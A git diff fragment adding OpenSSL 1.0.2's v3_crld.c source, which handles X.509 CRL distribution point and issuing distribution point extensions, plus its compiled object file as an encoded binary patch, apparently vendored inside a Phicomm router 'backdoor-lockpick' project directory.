+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/asn1.h>
+#include <openssl/asn1t.h>
+#include <openssl/x509v3.h>
+
+static void *v2i_crld(const X509V3_EXT_METHOD *method,
+                      X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *nval);
+static int i2r_crldp(const X509V3_EXT_METHOD *method, void *pcrldp, BIO *out,
+                     int indent);
+
+const X509V3_EXT_METHOD v3_crld = {
+    NID_crl_distribution_points, 0, ASN1_ITEM_ref(CRL_DIST_POINTS),
+    0, 0, 0, 0,
+    0, 0,
+    0,
+    v2i_crld,
+    i2r_crldp, 0,
+    NULL
+};
+
+const X509V3_EXT_METHOD v3_freshest_crl = {
+    NID_freshest_crl, 0, ASN1_ITEM_ref(CRL_DIST_POINTS),
+    0, 0, 0, 0,
+    0, 0,
+    0,
+    v2i_crld,
+    i2r_crldp, 0,
+    NULL
+};
+
+static STACK_OF(GENERAL_NAME) *gnames_from_sectname(X509V3_CTX *ctx,
+                                                    char *sect)
+{
+    STACK_OF(CONF_VALUE) *gnsect;
+    STACK_OF(GENERAL_NAME) *gens;
+    if (*sect == '@')
+        gnsect = X509V3_get_section(ctx, sect + 1);
+    else
+        gnsect = X509V3_parse_list(sect);
+    if (!gnsect) {
+        X509V3err(X509V3_F_GNAMES_FROM_SECTNAME, X509V3_R_SECTION_NOT_FOUND);
+        return NULL;
+    }
+    gens = v2i_GENERAL_NAMES(NULL, ctx, gnsect);
+    if (*sect == '@')
+        X509V3_section_free(ctx, gnsect);
+    else
+        sk_CONF_VALUE_pop_free(gnsect, X509V3_conf_free);
+    return gens;
+}
+
+static int set_dist_point_name(DIST_POINT_NAME **pdp, X509V3_CTX *ctx,
+                               CONF_VALUE *cnf)
+{
+    STACK_OF(GENERAL_NAME) *fnm = NULL;
+    STACK_OF(X509_NAME_ENTRY) *rnm = NULL;
+    if (!strncmp(cnf->name, "fullname", 9)) {
+        fnm = gnames_from_sectname(ctx, cnf->value);
+        if (!fnm)
+            goto err;
+    } else if (!strcmp(cnf->name, "relativename")) {
+        int ret;
+        STACK_OF(CONF_VALUE) *dnsect;
+        X509_NAME *nm;
+        nm = X509_NAME_new();
+        if (!nm)
+            return -1;
+        dnsect = X509V3_get_section(ctx, cnf->value);
+        if (!dnsect) {
+            X509V3err(X509V3_F_SET_DIST_POINT_NAME,
+                      X509V3_R_SECTION_NOT_FOUND);
+            return -1;
+        }
+        ret = X509V3_NAME_from_section(nm, dnsect, MBSTRING_ASC);
+        X509V3_section_free(ctx, dnsect);
+        rnm = nm->entries;
+        nm->entries = NULL;
+        X509_NAME_free(nm);
+        if (!ret || sk_X509_NAME_ENTRY_num(rnm) <= 0)
+            goto err;
+        /*
+         * Since its a name fragment can't have more than one RDNSequence
+         */
+        if (sk_X509_NAME_ENTRY_value(rnm,
+                                     sk_X509_NAME_ENTRY_num(rnm) - 1)->set) {
+            X509V3err(X509V3_F_SET_DIST_POINT_NAME,
+                      X509V3_R_INVALID_MULTIPLE_RDNS);
+            goto err;
+        }
+    } else
+        return 0;
+
+    if (*pdp) {
+        X509V3err(X509V3_F_SET_DIST_POINT_NAME,
+                  X509V3_R_DISTPOINT_ALREADY_SET);
+        goto err;
+    }
+
+    *pdp = DIST_POINT_NAME_new();
+    if (!*pdp)
+        goto err;
+    if (fnm) {
+        (*pdp)->type = 0;
+        (*pdp)->name.fullname = fnm;
+    } else {
+        (*pdp)->type = 1;
+        (*pdp)->name.relativename = rnm;
+    }
+
+    return 1;
+
+ err:
+    if (fnm)
+        sk_GENERAL_NAME_pop_free(fnm, GENERAL_NAME_free);
+    if (rnm)
+        sk_X509_NAME_ENTRY_pop_free(rnm, X509_NAME_ENTRY_free);
+    return -1;
+}
+
+static const BIT_STRING_BITNAME reason_flags[] = {
+    {0, "Unused", "unused"},
+    {1, "Key Compromise", "keyCompromise"},
+    {2, "CA Compromise", "CACompromise"},
+    {3, "Affiliation Changed", "affiliationChanged"},
+    {4, "Superseded", "superseded"},
+    {5, "Cessation Of Operation", "cessationOfOperation"},
+    {6, "Certificate Hold", "certificateHold"},
+    {7, "Privilege Withdrawn", "privilegeWithdrawn"},
+    {8, "AA Compromise", "AACompromise"},
+    {-1, NULL, NULL}
+};
+
+static int set_reasons(ASN1_BIT_STRING **preas, char *value)
+{
+    STACK_OF(CONF_VALUE) *rsk = NULL;
+    const BIT_STRING_BITNAME *pbn;
+    const char *bnam;
+    int i, ret = 0;
+    rsk = X509V3_parse_list(value);
+    if (!rsk)
+        return 0;
+    if (*preas)
+        return 0;
+    for (i = 0; i < sk_CONF_VALUE_num(rsk); i++) {
+        bnam = sk_CONF_VALUE_value(rsk, i)->name;
+        if (!*preas) {
+            *preas = ASN1_BIT_STRING_new();
+            if (!*preas)
+                goto err;
+        }
+        for (pbn = reason_flags; pbn->lname; pbn++) {
+            if (!strcmp(pbn->sname, bnam)) {
+                if (!ASN1_BIT_STRING_set_bit(*preas, pbn->bitnum, 1))
+                    goto err;
+                break;
+            }
+        }
+        if (!pbn->lname)
+            goto err;
+    }
+    ret = 1;
+
+ err:
+    sk_CONF_VALUE_pop_free(rsk, X509V3_conf_free);
+    return ret;
+}
+
+static int print_reasons(BIO *out, const char *rname,
+                         ASN1_BIT_STRING *rflags, int indent)
+{
+    int first = 1;
+    const BIT_STRING_BITNAME *pbn;
+    BIO_printf(out, "%*s%s:\n%*s", indent, "", rname, indent + 2, "");
+    for (pbn = reason_flags; pbn->lname; pbn++) {
+        if (ASN1_BIT_STRING_get_bit(rflags, pbn->bitnum)) {
+            if (first)
+                first = 0;
+            else
+                BIO_puts(out, ", ");
+            BIO_puts(out, pbn->lname);
+        }
+    }
+    if (first)
+        BIO_puts(out, "<EMPTY>\n");
+    else
+        BIO_puts(out, "\n");
+    return 1;
+}
+
+static DIST_POINT *crldp_from_section(X509V3_CTX *ctx,
+                                      STACK_OF(CONF_VALUE) *nval)
+{
+    int i;
+    CONF_VALUE *cnf;
+    DIST_POINT *point = NULL;
+    point = DIST_POINT_new();
+    if (!point)
+        goto err;
+    for (i = 0; i < sk_CONF_VALUE_num(nval); i++) {
+        int ret;
+        cnf = sk_CONF_VALUE_value(nval, i);
+        ret = set_dist_point_name(&point->distpoint, ctx, cnf);
+        if (ret > 0)
+            continue;
+        if (ret < 0)
+            goto err;
+        if (!strcmp(cnf->name, "reasons")) {
+            if (!set_reasons(&point->reasons, cnf->value))
+                goto err;
+        } else if (!strcmp(cnf->name, "CRLissuer")) {
+            point->CRLissuer = gnames_from_sectname(ctx, cnf->value);
+            if (!point->CRLissuer)
+                goto err;
+        }
+    }
+
+    return point;
+
+ err:
+    if (point)
+        DIST_POINT_free(point);
+    return NULL;
+}
+
+static void *v2i_crld(const X509V3_EXT_METHOD *method,
+                      X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *nval)
+{
+    STACK_OF(DIST_POINT) *crld = NULL;
+    GENERAL_NAMES *gens = NULL;
+    GENERAL_NAME *gen = NULL;
+    CONF_VALUE *cnf;
+    int i;
+    if (!(crld = sk_DIST_POINT_new_null()))
+        goto merr;
+    for (i = 0; i < sk_CONF_VALUE_num(nval); i++) {
+        DIST_POINT *point;
+        cnf = sk_CONF_VALUE_value(nval, i);
+        if (!cnf->value) {
+            STACK_OF(CONF_VALUE) *dpsect;
+            dpsect = X509V3_get_section(ctx, cnf->name);
+            if (!dpsect)
+                goto err;
+            point = crldp_from_section(ctx, dpsect);
+            X509V3_section_free(ctx, dpsect);
+            if (!point)
+                goto err;
+            if (!sk_DIST_POINT_push(crld, point)) {
+                DIST_POINT_free(point);
+                goto merr;
+            }
+        } else {
+            if (!(gen = v2i_GENERAL_NAME(method, ctx, cnf)))
+                goto err;
+            if (!(gens = GENERAL_NAMES_new()))
+                goto merr;
+            if (!sk_GENERAL_NAME_push(gens, gen))
+                goto merr;
+            gen = NULL;
+            if (!(point = DIST_POINT_new()))
+                goto merr;
+            if (!sk_DIST_POINT_push(crld, point)) {
+                DIST_POINT_free(point);
+                goto merr;
+            }
+            if (!(point->distpoint = DIST_POINT_NAME_new()))
+                goto merr;
+            point->distpoint->name.fullname = gens;
+            point->distpoint->type = 0;
+            gens = NULL;
+        }
+    }
+    return crld;
+
+ merr:
+    X509V3err(X509V3_F_V2I_CRLD, ERR_R_MALLOC_FAILURE);
+ err:
+    GENERAL_NAME_free(gen);
+    GENERAL_NAMES_free(gens);
+    sk_DIST_POINT_pop_free(crld, DIST_POINT_free);
+    return NULL;
+}
+
+IMPLEMENT_STACK_OF(DIST_POINT)
+
+IMPLEMENT_ASN1_SET_OF(DIST_POINT)
+
+static int dpn_cb(int operation, ASN1_VALUE **pval, const ASN1_ITEM *it,
+                  void *exarg)
+{
+    DIST_POINT_NAME *dpn = (DIST_POINT_NAME *)*pval;
+
+    switch (operation) {
+    case ASN1_OP_NEW_POST:
+        dpn->dpname = NULL;
+        break;
+
+    case ASN1_OP_FREE_POST:
+        if (dpn->dpname)
+            X509_NAME_free(dpn->dpname);
+        break;
+    }
+    return 1;
+}
+
+
+ASN1_CHOICE_cb(DIST_POINT_NAME, dpn_cb) = {
+        ASN1_IMP_SEQUENCE_OF(DIST_POINT_NAME, name.fullname, GENERAL_NAME, 0),
+        ASN1_IMP_SET_OF(DIST_POINT_NAME, name.relativename, X509_NAME_ENTRY, 1)
+} ASN1_CHOICE_END_cb(DIST_POINT_NAME, DIST_POINT_NAME, type)
+
+
+IMPLEMENT_ASN1_FUNCTIONS(DIST_POINT_NAME)
+
+ASN1_SEQUENCE(DIST_POINT) = {
+        ASN1_EXP_OPT(DIST_POINT, distpoint, DIST_POINT_NAME, 0),
+        ASN1_IMP_OPT(DIST_POINT, reasons, ASN1_BIT_STRING, 1),
+        ASN1_IMP_SEQUENCE_OF_OPT(DIST_POINT, CRLissuer, GENERAL_NAME, 2)
+} ASN1_SEQUENCE_END(DIST_POINT)
+
+IMPLEMENT_ASN1_FUNCTIONS(DIST_POINT)
+
+ASN1_ITEM_TEMPLATE(CRL_DIST_POINTS) =
+        ASN1_EX_TEMPLATE_TYPE(ASN1_TFLG_SEQUENCE_OF, 0, CRLDistributionPoints, DIST_POINT)
+ASN1_ITEM_TEMPLATE_END(CRL_DIST_POINTS)
+
+IMPLEMENT_ASN1_FUNCTIONS(CRL_DIST_POINTS)
+
+ASN1_SEQUENCE(ISSUING_DIST_POINT) = {
+        ASN1_EXP_OPT(ISSUING_DIST_POINT, distpoint, DIST_POINT_NAME, 0),
+        ASN1_IMP_OPT(ISSUING_DIST_POINT, onlyuser, ASN1_FBOOLEAN, 1),
+        ASN1_IMP_OPT(ISSUING_DIST_POINT, onlyCA, ASN1_FBOOLEAN, 2),
+        ASN1_IMP_OPT(ISSUING_DIST_POINT, onlysomereasons, ASN1_BIT_STRING, 3),
+        ASN1_IMP_OPT(ISSUING_DIST_POINT, indirectCRL, ASN1_FBOOLEAN, 4),
+        ASN1_IMP_OPT(ISSUING_DIST_POINT, onlyattr, ASN1_FBOOLEAN, 5)
+} ASN1_SEQUENCE_END(ISSUING_DIST_POINT)
+
+IMPLEMENT_ASN1_FUNCTIONS(ISSUING_DIST_POINT)
+
+static int i2r_idp(const X509V3_EXT_METHOD *method, void *pidp, BIO *out,
+                   int indent);
+static void *v2i_idp(const X509V3_EXT_METHOD *method, X509V3_CTX *ctx,
+                     STACK_OF(CONF_VALUE) *nval);
+
+const X509V3_EXT_METHOD v3_idp = {
+    NID_issuing_distribution_point, X509V3_EXT_MULTILINE,
+    ASN1_ITEM_ref(ISSUING_DIST_POINT),
+    0, 0, 0, 0,
+    0, 0,
+    0,
+    v2i_idp,
+    i2r_idp, 0,
+    NULL
+};
+
+static void *v2i_idp(const X509V3_EXT_METHOD *method, X509V3_CTX *ctx,
+                     STACK_OF(CONF_VALUE) *nval)
+{
+    ISSUING_DIST_POINT *idp = NULL;
+    CONF_VALUE *cnf;
+    char *name, *val;
+    int i, ret;
+    idp = ISSUING_DIST_POINT_new();
+    if (!idp)
+        goto merr;
+    for (i = 0; i < sk_CONF_VALUE_num(nval); i++) {
+        cnf = sk_CONF_VALUE_value(nval, i);
+        name = cnf->name;
+        val = cnf->value;
+        ret = set_dist_point_name(&idp->distpoint, ctx, cnf);
+        if (ret > 0)
+            continue;
+        if (ret < 0)
+            goto err;
+        if (!strcmp(name, "onlyuser")) {
+            if (!X509V3_get_value_bool(cnf, &idp->onlyuser))
+                goto err;
+        } else if (!strcmp(name, "onlyCA")) {
+            if (!X509V3_get_value_bool(cnf, &idp->onlyCA))
+                goto err;
+        } else if (!strcmp(name, "onlyAA")) {
+            if (!X509V3_get_value_bool(cnf, &idp->onlyattr))
+                goto err;
+        } else if (!strcmp(name, "indirectCRL")) {
+            if (!X509V3_get_value_bool(cnf, &idp->indirectCRL))
+                goto err;
+        } else if (!strcmp(name, "onlysomereasons")) {
+            if (!set_reasons(&idp->onlysomereasons, val))
+                goto err;
+        } else {
+            X509V3err(X509V3_F_V2I_IDP, X509V3_R_INVALID_NAME);
+            X509V3_conf_err(cnf);
+            goto err;
+        }
+    }
+    return idp;
+
+ merr:
+    X509V3err(X509V3_F_V2I_IDP, ERR_R_MALLOC_FAILURE);
+ err:
+    ISSUING_DIST_POINT_free(idp);
+    return NULL;
+}
+
+static int print_gens(BIO *out, STACK_OF(GENERAL_NAME) *gens, int indent)
+{
+    int i;
+    for (i = 0; i < sk_GENERAL_NAME_num(gens); i++) {
+        BIO_printf(out, "%*s", indent + 2, "");
+        GENERAL_NAME_print(out, sk_GENERAL_NAME_value(gens, i));
+        BIO_puts(out, "\n");
+    }
+    return 1;
+}
+
+static int print_distpoint(BIO *out, DIST_POINT_NAME *dpn, int indent)
+{
+    if (dpn->type == 0) {
+        BIO_printf(out, "%*sFull Name:\n", indent, "");
+        print_gens(out, dpn->name.fullname, indent);
+    } else {
+        X509_NAME ntmp;
+        ntmp.entries = dpn->name.relativename;
+        BIO_printf(out, "%*sRelative Name:\n%*s", indent, "", indent + 2, "");
+        X509_NAME_print_ex(out, &ntmp, 0, XN_FLAG_ONELINE);
+        BIO_puts(out, "\n");
+    }
+    return 1;
+}
+
+static int i2r_idp(const X509V3_EXT_METHOD *method, void *pidp, BIO *out,
+                   int indent)
+{
+    ISSUING_DIST_POINT *idp = pidp;
+    if (idp->distpoint)
+        print_distpoint(out, idp->distpoint, indent);
+    if (idp->onlyuser > 0)
+        BIO_printf(out, "%*sOnly User Certificates\n", indent, "");
+    if (idp->onlyCA > 0)
+        BIO_printf(out, "%*sOnly CA Certificates\n", indent, "");
+    if (idp->indirectCRL > 0)
+        BIO_printf(out, "%*sIndirect CRL\n", indent, "");
+    if (idp->onlysomereasons)
+        print_reasons(out, "Only Some Reasons", idp->onlysomereasons, indent);
+    if (idp->onlyattr > 0)
+        BIO_printf(out, "%*sOnly Attribute Certificates\n", indent, "");
+    if (!idp->distpoint && (idp->onlyuser <= 0) && (idp->onlyCA <= 0)
+        && (idp->indirectCRL <= 0) && !idp->onlysomereasons
+        && (idp->onlyattr <= 0))
+        BIO_printf(out, "%*s<EMPTY>\n", indent, "");
+
+    return 1;
+}
+
+static int i2r_crldp(const X509V3_EXT_METHOD *method, void *pcrldp, BIO *out,
+                     int indent)
+{
+    STACK_OF(DIST_POINT) *crld = pcrldp;
+    DIST_POINT *point;
+    int i;
+    for (i = 0; i < sk_DIST_POINT_num(crld); i++) {
+        BIO_puts(out, "\n");
+        point = sk_DIST_POINT_value(crld, i);
+        if (point->distpoint)
+            print_distpoint(out, point->distpoint, indent);
+        if (point->reasons)
+            print_reasons(out, "Reasons", point->reasons, indent);
+        if (point->CRLissuer) {
+            BIO_printf(out, "%*sCRL Issuer:\n", indent, "");
+            print_gens(out, point->CRLissuer, indent);
+        }
+    }
+    return 1;
+}
+
+int DIST_POINT_set_dpname(DIST_POINT_NAME *dpn, X509_NAME *iname)
+{
+    int i;
+    STACK_OF(X509_NAME_ENTRY) *frag;
+    X509_NAME_ENTRY *ne;
+    if (!dpn || (dpn->type != 1))
+        return 1;
+    frag = dpn->name.relativename;
+    dpn->dpname = X509_NAME_dup(iname);
+    if (!dpn->dpname)
+        return 0;
+    for (i = 0; i < sk_X509_NAME_ENTRY_num(frag); i++) {
+        ne = sk_X509_NAME_ENTRY_value(frag, i);
+        if (!X509_NAME_add_entry(dpn->dpname, ne, -1, i ? 0 : 1)) {
+            X509_NAME_free(dpn->dpname);
+            dpn->dpname = NULL;
+            return 0;
+        }
+    }
+    /* generate cached encoding of name */
+    if (i2d_X509_NAME(dpn->dpname, NULL) < 0) {
+        X509_NAME_free(dpn->dpname);
+        dpn->dpname = NULL;
+        return 0;
+    }
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_crld.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/v3_crld.o
new file mode 100644
index 0000000000000000000000000000000000000000..1d10da57478b9aadec13ac1bfcb765d0a14c0b8c
GIT binary patch
literal 18720
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
